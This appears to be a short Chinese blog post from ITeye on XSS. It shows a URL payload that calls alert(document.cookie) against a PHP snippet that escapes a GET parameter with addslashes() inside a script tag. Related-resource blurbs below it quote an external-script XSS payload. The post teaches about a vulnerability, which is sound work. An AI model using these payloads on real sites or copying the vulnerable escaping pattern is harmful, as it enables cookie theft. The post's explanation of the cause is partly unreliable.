xss注入 - shake863 - ITeye博客

`

shake863

浏览: 661581 次
性别:
来自: 北京

最近访客更多访客>>

morelily

u012363178

集xx

zxf_noimp

博主相关

博客

微博

相册

收藏

留言

关于我

文章分类

社区版块

存档分类

最新评论

sztime：可以在文本框上绑定事件来禁用回车键, 我就是这样做的.在IE中 ...
form 回车自动提交问题
damoqiongqiu：非常好的文章，很透彻不过有一句话小僧腆着脸补充一下：“1111 ...
为什么要用补码来做存储
wuyizhong：原来如此啊。
form 回车自动提交问题
luliangy：谢楼主～！
用C语言扩展Python的功能
kwong：很有用，谢谢
火狐和IE 对css 样式解释的差异

xss注入

博客分类：

web应用

PHP 浏览器 Java

阅读更多

先看看一个例子：

http://localhost/php-1.php?key=%dd%22;alert(document.cookie);//

下面是php的代码：

$key = $_GET['key'];
echo "<script>";
echo "var a  = \"".addslashes($key)."\"";
echo "</script>";

这个时候会把用户的cookie给打出来。

看看原因。

现代的浏览器都支持对urlencode 的自动转换，当你输入”%22“的时候会自动转义成 ”"“ ;
同样道理”%5C%27“ 会被转义成”'“,所以在用户在url提交的关键字中，会被浏览器
自动转义。

如果这些输入被输出在页面上，或者插入到数据库中的话，就会把原来的数据截断，造成错误。
甚至可以获取非法权限。

分享到：

haha | curl 表单的封装

2009-01-16 17:57
浏览 1483
评论(0)
查看更多

评论

发表评论

您还没有登录,请您登录后再发表评论

相关推荐

xss-labs-master.zip（xss注入通关游戏/靶场）: **XSS注入详解** XSS（Cross Site Scripting），即跨站脚本攻击，是一种常见的Web应用程序安全漏洞。它允许攻击者在用户浏览器上执行恶意脚本，从而获取敏感信息、操控用户行为或进行钓鱼攻击。`xss-labs-master....

java防止xss注入: **Java防止XSS注入详解** XSS（Cross-site scripting）是一种常见的网络安全漏洞，攻击者通过在网页中嵌入恶意脚本，使用户在不知情的情况下执行这些脚本，从而窃取用户信息或进行其他恶意操作。Java作为广泛应用于...

ctf xss注入.pdf: ### XSS注入技术详解 #### 一、XSS注入概述跨站脚本攻击（Cross-site scripting，简称XSS）是一种常见的网络安全漏洞，攻击者通过在网页中注入恶意脚本，当用户浏览该页面时，嵌入其中的脚本会被执行，从而达到...

xss注入讲解ppt.pptx: xss 注入讲解ppt xss 是一种常见的 web 应用安全漏洞，能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中，从而达到恶意攻击用户的目的。xss 可以追溯到上世纪 90 年代，已经超过缓冲区溢出成为最流行的...

JAVA防止XSS注入，附jar包: 对于Java开发人员来说，防止XSS注入至关重要，因为这有助于确保应用程序的安全性。本篇文章将深入探讨如何使用Java来防御XSS攻击，并介绍提供的jar包以及如何应用它们。首先，了解XSS攻击的基本原理。XSS攻击通常...

腾讯系列的XSS注入篇: 本资料包"心伤的瘦子腾讯XSS系列"包含了21篇文章，详细探讨了腾讯系列的XSS注入问题。以下是对这一主题的深入分析： 1. **XSS攻击类型**：XSS攻击主要分为三类：反射型XSS、存储型XSS和DOM型XSS。反射型XSS是通过...

java防止xss注入.rar 附案例及jar包: Java防止XSS注入是一个重要的开发实践，以确保应用程序的安全性。首先，我们需要理解XSS的类型：存储型、反射型和DOM型。存储型XSS是将恶意脚本存储在服务器上，然后被其他用户加载时执行；反射型XSS则是通过诱使...

XSS跨站攻击，注入代码整理，大全: 接下来，我们将详细介绍并解析上述文件中的XSS注入代码示例，以便更好地理解各种XSS攻击方式和技术。 ##### 1. 通过`<script>`标签注入外部JS文件 ```html <SCRIPT SRC=http://3w.org/XSS/xss.js> ``` 这种方式通过...

XSS注入样例，渗透测试模板: XSS注入样例和代码

web十大漏洞之xss注入靶场文件: web十大漏洞之xss注入靶场文件

swfupload xss 注入修复: *swfUpload/Flash/swfupload.swf?movieName=aaa"])}catch(e)...*解决swfupload-xss注入，自己项目中遇到的，已经修改亲测通过 *将文件中的swf文件替换掉项目中的swf文件 *将swfupload.as文件替换掉项目中的as文件即可

java web Xss及sql注入过滤器.zip: XSS（Cross Site Scripting）和 SQL 注入是两种常见的Web应用程序安全漏洞，它们可能导致数据泄露、用户权限被滥用甚至整个系统的瘫痪。本项目"java web Xss及sql注入过滤器.zip"就是针对这两种威胁提供的一种解决...

Spring-MVC处理XSS、SQL注入攻击的方法总结: ### Spring MVC 处理 XSS 和 SQL 注入攻击的方法总结 #### 一、引言在 Web 开发领域，特别是基于 Java 的应用开发中，Spring MVC 框架因其灵活高效的特点而被广泛采用。然而，随着互联网技术的发展，网络安全问题...

XSS注入知识点总结.pdf: XSS（跨站脚本攻击）是一种常见的网络安全漏洞，主要利用Web页面中存在的漏洞，允许攻击者在用户浏览器中执行恶意JavaScript代码。由于JavaScript的强大能力，攻击者可以通过XSS对网站用户进行多种恶意行为，如窃取...

关于pdf文件xss攻击问题，配置xssFilter方法: XSS攻击是通过在网页中注入可执行的脚本，当用户访问被注入脚本的页面时，这些脚本会在用户的浏览器环境中运行，从而可能执行攻击者设计的各种操作。PDF文件中的XSS攻击则是在PDF阅读器解析文档时触发恶意脚本，而...

Java防止xss攻击附相关文件下载: XSS（跨站脚本）攻击是由于网页应用程序未能正确处理用户输入的数据，使得攻击者能够注入恶意代码，影响其他用户的浏览器。以下是一些关于Java防止XSS攻击的关键知识点： 1. **使用Filter拦截器**：在Java Web...

django框架防止XSS注入的方法分析: Django框架作为Python的一款强大Web开发框架，提供了多种手段来帮助开发者防止XSS注入。首先，Django的模板引擎默认开启HTML转义功能。这意味着当变量在模板中被渲染时，例如`{{ comment }}`，任何HTML特殊字符如`...

flask-sql-xss-injection-check:Flask扩展名，用于检查传入请求上SQL和XSS注入: Flask-SQL-XSS-注入检查 Flask扩展，用于支持对传入请求SQL和XSS注入检查。对于SQL或XSS注入检查为肯定的请求，这将返回400错误的请求响应安装使用pip或easy_install安装扩展。 $ pip install -U flask-sql-xss-...

web安全之XSS攻击及防御pdf: 跨站脚本攻击(Cross-Site Scripting,简称XSS)是一种常见的Web应用程序安全漏洞，其形成原因主要是由于Web应用程序对用户输入的数据过滤不充分或者处理不当，导致恶意脚本被注入到网页中。当其他用户访问这些包含恶意...

扫描sql注入与xss攻击的牛b工具: 在网络安全领域，SQL注入和XSS（跨站脚本）攻击是两种常见的威胁，它们针对的是Web应用程序的安全性。本文将详细介绍这两种攻击类型以及相关的防范措施，并介绍一款名为"扫描SQL注射与XSS攻击的牛B工具"的实用工具，...

Global site tag (gtag.js) - Google Analytics